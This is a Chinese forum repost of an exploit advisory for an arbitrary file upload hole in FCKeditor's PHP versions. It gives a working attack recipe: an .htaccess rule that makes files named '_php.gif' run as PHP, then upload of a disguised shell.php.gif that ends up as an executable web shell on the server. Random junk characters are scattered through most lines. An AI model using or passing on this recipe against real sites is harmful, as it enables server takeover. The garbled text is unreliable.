FCKeditor所有php版本Upload上传漏洞7 u; t" P. `( ]4 A
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07& f) u) c2 g; g. f- s8 |5 F
减小字体 增大字体
' }3 L. @) T- _2 b[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
S% B. Z" x s- v[+] Date: 20118 Y7 E4 @5 ?# o, X
[+] Author : sinesafe.cn8 V6 D! g2 a7 i3 B8 q- @
[+] Website : WwW.sinesafe.cn
) y% d1 s b. [% s- k———————————————————
/ @9 ?$ K9 \2 h$ w3 W1.create a htaccess file:" T& _: G5 ]( q
code:& H! Z; S1 r. o3 h) J
<FilesMatch “_php.gif”># H" R l' P) z! E/ n4 j0 a: B
SetHandler application/x-httpd-php& N) F6 ? Z! ~: W; U
</FilesMatch>
% C) v+ r t# }7 v5 V5 R& D0 q6 J
) e7 z k2 |: x8 e( z8 B2.Now upload this htaccess with FCKeditor.
. K( x$ j9 y* g4 z) {2 h5 F( Z2 h9 P2 y7 z$ f. O
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
$ v" S' C; E6 E! [7 e7 O
# o9 W/ J# f. p' e# p7 K) R. Jhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
: K( j9 j; u' l
! j+ R8 b. J8 G( m6 u. p2 {6 T* M8 p———————————————————————————————-' r6 @5 `+ t" w. g. b3 U1 \
3.Now upload shell.php.gif with FCKeditor.
" V, H$ L1 @5 i) \# W) t+ H, H9 A4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.& {/ s" A% `, ?
5.http://www.sinesafe.cn/anything/shell_php.gif$ x: D" w5 X& W! h/ _0 Y' w
6.Now shell is available from server. |
6 @+ b" k% G* U8 a j1 f* b
2 N; C7 [( u4 \; o+ Y8 k% {$ j9 p* z: W
|
发表于 2013-10-27 17:25:21
收藏
支持
反对